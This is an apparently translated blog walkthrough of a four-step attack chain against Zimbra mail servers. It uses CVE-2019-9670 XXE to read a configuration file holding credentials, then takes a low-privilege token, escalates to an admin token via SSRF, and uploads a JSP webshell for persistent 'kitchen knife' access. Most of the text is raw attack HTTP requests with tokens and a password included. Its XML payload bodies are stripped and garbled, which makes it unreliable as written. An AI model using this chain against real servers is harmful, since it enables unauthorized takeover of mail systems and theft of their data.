Zimbra

Time:2020-1-12

Step 1: read the configuration file with xxE

 

Cve-2019-9670 vulnerability is exploited here to read the configuration file. You need to place a DTD file on your VPS server and make the file accessible through HTTP. For demonstration, I created a warehouse on GitHub to get DTD files from GitHub.

In the above figure, the password of Zimbra account is circled in red box, which will be used after being written down.

DTD file contents are as follows:

1   
2  
3 ">  
4 "> 

The post request package is as follows:

POST /Autodiscover/Autodiscover.xml HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 436  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

  
          
        %dtd;  
        %all;  
        ]>  
  
      
        aaaaa  
        &fileContents;

Step 2: get low permission token

It can be seen from the above figure that a token has been obtained, but it is not an administrator’s token. It will be used later after being recorded temporarily.

The post request package is as follows:

POST /service/soap HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 467  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

  
     
         
             
         
     
     
       
        zimbra  
        GzXaU76_s5

Step 3: use SSRF to obtain admin permission token

Add the low permission token obtained in the previous step to the cookie, change xmlns = “urn: zimpraaccount” to xmlns = “urn: zimpraadmin”, add “: 7071” at the end of the host field, and use HTTPS protocol for the target in the URL. Then send the request to get the token of admin permission.

The post request package is as follows:

POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1  
Host: mail.****.com:7071  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml  
Content-Length: 465  
Connection: close  
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b  
Upgrade-Insecure-Requests: 1  

  
     
         
             
         
     
     
       
        zimbra  
        GzXaU76_s5

Step 4: upload webshell

Add the admin permission token obtained in the previous step to the cookie, and then upload webshell.

The webshell path is / downloads / k4x6p.jsp. To access the webshell, you need to add admin_token to the cookie.

You can use this webshell to create a colt that can be connected with a kitchen knife in other directories that can be accessed without a cookie.

I mainly did some sorting work, thank you for the analysis articles written by the big guys on the Internet.

Reference link:

https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

https://blog.csdn.net/fnmsd/article/details/88657083

http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448

http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd